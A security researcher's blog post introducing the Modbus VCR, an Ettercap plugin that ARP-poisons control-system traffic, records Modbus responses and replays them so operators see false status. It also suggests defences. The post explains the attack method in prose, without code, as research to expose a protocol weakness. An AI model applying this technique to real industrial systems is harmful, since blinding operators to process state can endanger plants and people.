Introducing the Modbus VCR

| No Comments | No TrackBacks
vcr_kimchipenguin.jpgI gave a talk two months or so ago at the Embedded Device Security Conference entitled 'Hacking Your Control System at Level 2'.  I released a silly little tool as part of the talk, one that probably hasn't gotten enough attention, even from me.  That's a shame, because the tool is kind of interesting, and covers ground that we as security people "all know," but that we tend to forget about when we are doing security engagements for industrial customers.

The tool is the Modbus VCR.  It is a plugin for the Ettercap framework which records Modbus/TCP (or really any cyclic traffic) for a period of time between a client and a server and later replays protocol state.  The purpose of the tool is to show a really old, really dumb problem with control systems protocols: the lack of data integrity isn't just about control, it's about status, too.
The Modbus VCR works by performing ARP poisoning (courtesy of Ettercap) against a master, slave, or router, recording request-response pairs between the master and slave.  When it sees a request go across the wire, it flags it as the start of a pair.  When it sees the response to that request, it associates the response with the request and records the associated pair in a list.

Once the stop condition is met (currently 10 seconds of recording), the Modbus VCR begins overwriting response traffic.  It does so by looking up the current request in the global request-response pair list.  It then keeps a pointer to the recorded response.  When it sees the actual response to the request come from the slave device, it overwrites the data portion of the new response with the data from the previously-recorded response.

The beautiful (or scary) thing about attacking a control system using the Modbus VCR is that it fools operators as to what the status of their control network is, just like Stuxnet.  The operator is blind, but doesn't know that they are blind. Unlike Stuxnet, it is universal: it requires no knowledge of the process being controlled.  It just does its thing, recording and replaying traffic, without any concern as to what the values even mean.

The Modbus VCR concept can easily be applied to other control systems protocols: DNP3 (at least, variants that do not implement Secure Authentication), ICCP (variants that lack use of SSL), 61850, 60870, and almost every vendor's proprietary protocol is vulnerable to this style of attack.

Unfortunately field firewalls don't help here -- I came up with this tool precisely because I was assessing a very good field device firewall.  ARP poison detection on all segments of the control system network are required to detect this attack.  In order to truly prevent the attack, we need to consider the use of secure-by-design protocols which have secure data integrity.  Even adding an SSL wrapper (with sufficient key management) to a protocol like Modbus would be enough to prevent this entire class of attack.

No TrackBacks

TrackBack URL:

Leave a comment

About this Entry

This page contains a single entry by giminy published on October 18, 2013 5:30 PM.

Cryptography Breakdown was the previous entry in this blog.

Control Systems: Insecurity All The Way Down is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.